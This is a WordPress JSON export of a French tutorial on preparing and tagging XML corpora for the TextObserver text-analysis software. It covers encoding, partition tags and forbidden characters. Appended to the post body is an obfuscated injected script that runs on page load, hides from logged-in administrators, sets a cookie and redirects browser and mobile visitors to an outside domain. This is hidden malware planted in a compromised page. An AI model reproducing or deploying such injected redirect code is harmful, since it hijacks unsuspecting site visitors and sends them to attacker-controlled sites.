{"id":210,"date":"2014-05-31T11:26:51","date_gmt":"2014-05-31T10:26:51","guid":{"rendered":"http:\/\/textopol2.u-pec.fr\/textobserver\/?p=210"},"modified":"2018-09-18T16:19:28","modified_gmt":"2018-09-18T15:19:28","slug":"balisage-xml-sur-la-forme-graphique","status":"publish","type":"post","link":"http:\/\/textopol.u-pec.fr\/textobserver\/?p=210","title":{"rendered":"Balisage xml sur la forme graphique"},"content":{"rendered":"<p><!--:fr-->1. Encoder le fichier xml<\/p>\n<p>Lors de la cr\u00e9ation du fichier xml choisir un encodage ANSI ou UTF-8 mais bien le pr\u00e9ciser \u00e0 l\u2019entr\u00e9e dans TextObserver afin que les accents se codent correctement. En enregistrant en texte brut avec word vous obtiendrez du ANSI.<\/p>\n<p>Lors de cet enregistrement pensez \u00e0 cocher \u00ab\u00a0autoriser le replacement des caract\u00e8res\u00a0\u00bb pour \u00e9viter entre autre les probl\u00e8mes d&rsquo;encodage des guillemets.<\/p>\n<p><a href=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/textebrut-autoriser-remplacement-caracteres.jpg\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-356\" alt=\"textebrut-autoriser-remplacement-caracteres\" src=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/textebrut-autoriser-remplacement-caracteres.jpg\" width=\"777\" height=\"388\" srcset=\"http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/textebrut-autoriser-remplacement-caracteres.jpg 777w, http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/textebrut-autoriser-remplacement-caracteres-300x149.jpg 300w, http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/textebrut-autoriser-remplacement-caracteres-624x311.jpg 624w\" sizes=\"(max-width: 777px) 100vw, 777px\" \/><\/a><\/p>\n<p>Nb\u00a0: le logiciel Notepad++ permet de convertir l\u2019encodage proprement si n\u00e9cessaire (menu Encodage&gt;Convertir en \u2026)<\/p>\n<p>2. Baliser le corpus<\/p>\n<p>Chaque division du corpus (partition) doit \u00eatre encadr\u00e9e par un balisage.<\/p>\n<p><a href=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/balise1.jpg\"><img loading=\"lazy\" class=\"alignnone size-large wp-image-216\" alt=\"balise1\" src=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/balise1.jpg\" width=\"621\" height=\"200\" srcset=\"http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/balise1.jpg 621w, http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/balise1-300x96.jpg 300w\" sizes=\"(max-width: 621px) 100vw, 621px\" \/><\/a><\/p>\n<p>extrait du fichier balis\u00e9 :<\/p>\n<p><a href=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/balisage-xml.jpg\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-215\" alt=\"balisage-xml\" src=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/balisage-xml.jpg\" width=\"621\" height=\"576\" srcset=\"http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/balisage-xml.jpg 621w, http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/balisage-xml-300x278.jpg 300w\" sizes=\"(max-width: 621px) 100vw, 621px\" \/><\/a><\/p>\n<p>Les caract\u00e8res interdits :<\/p>\n<ul>\n<li>Les textes ne doivent en aucun cas contenir des chevrons (\u2039 ou \u203a ) car ces caract\u00e8res perturbent le fonctionnement des balises xml.<\/li>\n<li>Ne pas laisser de &amp; (esperluette) dans le texte.<\/li>\n<li>les ~ (tildes) posent \u00e9galement probl\u00e8me<\/li>\n<li>pas de tabulations<\/li>\n<li>Ne pas utiliser les codes html pour remplacer les caract\u00e8res sp\u00e9ciaux ou accentu\u00e9s dans le texte.<\/li>\n<li>la balise (en anglais) est une balise r\u00e9serv\u00e9e&#8230; ne pas l&rsquo;utiliser pour encadrer les divisions du corpus.<\/li>\n<\/ul>\n<p>NB : Le fichier ne doit en aucun cas comporter de balise vide (partition ou W)<br \/>\nexemple de balise vide :<\/p>\n<p><a href=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/exemple-balise-xml-vide.jpg\"><img loading=\"lazy\" class=\"alignnone size-large wp-image-248\" alt=\"exemple-balise-xml-vide\" src=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/exemple-balise-xml-vide-1024x89.jpg\" width=\"625\" height=\"54\" srcset=\"http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/exemple-balise-xml-vide-1024x89.jpg 1024w, http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/exemple-balise-xml-vide-300x26.jpg 300w, http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/exemple-balise-xml-vide-624x54.jpg 624w, http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/exemple-balise-xml-vide.jpg 1305w\" sizes=\"(max-width: 625px) 100vw, 625px\" \/><\/a><br \/>\n(un mot doit figurer entre la balise ouvrante et la balise fermante )<\/p>\n<p>Une fois le corpus balis\u00e9, enregistrer en txt puis changer l&rsquo;extension .txt pour .xml<br \/>\nCopier ce fichier dans un dossier en racine de TextObserver.<\/p>\n<p><a title=\"Importer un corpus xml\" href=\"http:\/\/textopol2.u-pec.fr\/textobserver\/?p=46\">&gt;&gt; importer un corpus<\/a><!--:--><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.wow-robotics.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>1. Encoder le fichier xml Lors de la cr\u00e9ation du fichier xml choisir un encodage ANSI ou UTF-8 mais bien le pr\u00e9ciser \u00e0 l\u2019entr\u00e9e dans TextObserver afin que les accents se codent correctement. En enregistrant en texte brut avec word vous obtiendrez du ANSI. Lors de cet enregistrement pensez \u00e0 cocher \u00ab\u00a0autoriser le replacement des [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[4],"tags":[],"_links":{"self":[{"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=\/wp\/v2\/posts\/210"}],"collection":[{"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=210"}],"version-history":[{"count":20,"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=\/wp\/v2\/posts\/210\/revisions"}],"predecessor-version":[{"id":375,"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=\/wp\/v2\/posts\/210\/revisions\/375"}],"wp:attachment":[{"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=210"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=210"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=210"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}